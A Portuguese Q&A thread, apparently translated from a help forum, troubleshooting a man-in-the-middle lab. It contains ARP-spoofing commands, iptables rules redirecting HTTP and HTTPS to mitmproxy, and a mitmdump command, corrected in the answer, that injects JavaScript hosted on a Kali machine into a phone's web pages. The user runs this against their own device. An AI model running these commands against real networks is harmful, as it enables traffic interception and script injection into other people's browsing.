erro de mitmdump / usr / bin / mitmdump sem esses scripts

0

Estou tentando definir o tráfego de interceptação do meu telefone usando ARPspoof e injetar um cabeçalho de javascript na página.

Antes de começar, digitei estes comandos:

echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i wlan0 -o eth1 -j ACCEPT
sudo iptables -A FORWARD -i eth1 -o wlan0 -j ACCEPT
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080

Para interceptar o tráfego, eu digitei estes comandos:

sudo arpspoof -i wlan0 -t <phone_ip_here> <router_ip_here>
sudo arpspoof -i wlan0 -t <router_ip_here> <phone_ip_here>

E eu iniciei um servidor web para implantar o arquivo javascript que será incorporado em cada página da Web que o telefone recebe

Este servidor web será hospedado no IP do computador Kali na porta 8000

sudo python3 httpServer.py

E finalmente, quando executo o mitmdump, recebo este erro:

mitmdump -s 'injector.py http://<kali_computer_ip>:8000/script.js'

Mensagem de erro:

/usr/bin/mitmdump: No such script

Não tenho certeza do que estou fazendo errado, se eu executar o mitmproxy com o comando:

mitmproxy -p 8080

No entanto, o tráfego é encaminhado para o mitmproxy. No entanto, recebo um erro de 400 erros de solicitação no navegador do meu telefone e o mitmproxy retorna o erro do protocolo http.

Qualquer ajuda ou sugestão será muito bem recebida.

    
por SidS 27.05.2018 / 11:27

1 resposta

0

mitmdump -s 'injector.py http://<kali_computer_ip>:8000/script.js'

Preste muita atenção nas aspas simples. A opção -s para mitmdump especifica o nome do script a ser executado. Aqui, você está efetivamente dizendo ao computador que o nome do script é

injector.py<space>http://<kali_computer_ip>:8000/script.js

Como o nome do arquivo injector.py não possui caracteres especiais, ele não precisa ser citado. A URL, por outro lado, pode precisar de cotação se contiver um ponto de interrogação ou outros caracteres que tenham um significado especial para o shell. Portanto, supondo que o injector.py esteja localizado no diretório atual em que você está executando esse comando, acho que isso pode fazer o que você quer:

mitmdump -s injector.py 'http://<kali_computer_ip>:8000/script.js'
    
por 27.05.2018 / 13:13